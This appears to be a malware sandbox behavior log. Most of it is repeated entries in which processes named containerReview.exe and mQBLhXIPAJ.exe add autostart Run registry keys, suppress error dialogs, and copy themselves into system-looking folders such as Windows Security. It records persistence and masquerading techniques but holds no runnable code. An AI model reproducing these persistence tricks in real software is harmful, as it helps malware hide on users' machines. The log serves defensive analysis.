                                    Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run containerReviewJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run containerReviewJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run containerReviewJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run containerReviewJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mQBLhXIPAJJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mQBLhXIPAJJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mQBLhXIPAJJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mQBLhXIPAJJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mQBLhXIPAJJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mQBLhXIPAJJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mQBLhXIPAJJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mQBLhXIPAJJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mQBLhXIPAJJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mQBLhXIPAJJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mQBLhXIPAJJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mQBLhXIPAJJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run containerReviewJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run containerReviewJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\dbg\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\dbg\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\dbg\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\dbg\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\dbg\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\dbg\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\dbg\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\dbg\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\dbg\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\dbg\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\dbg\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\dbg\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\dbg\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\dbg\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\dbg\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\dbg\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\dbg\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\dbg\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\dbg\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\dbg\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\dbg\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\dbg\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\dbg\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\dbg\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\dbg\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\dbg\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\dbg\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\dbg\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\dbg\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\dbg\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\dbg\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
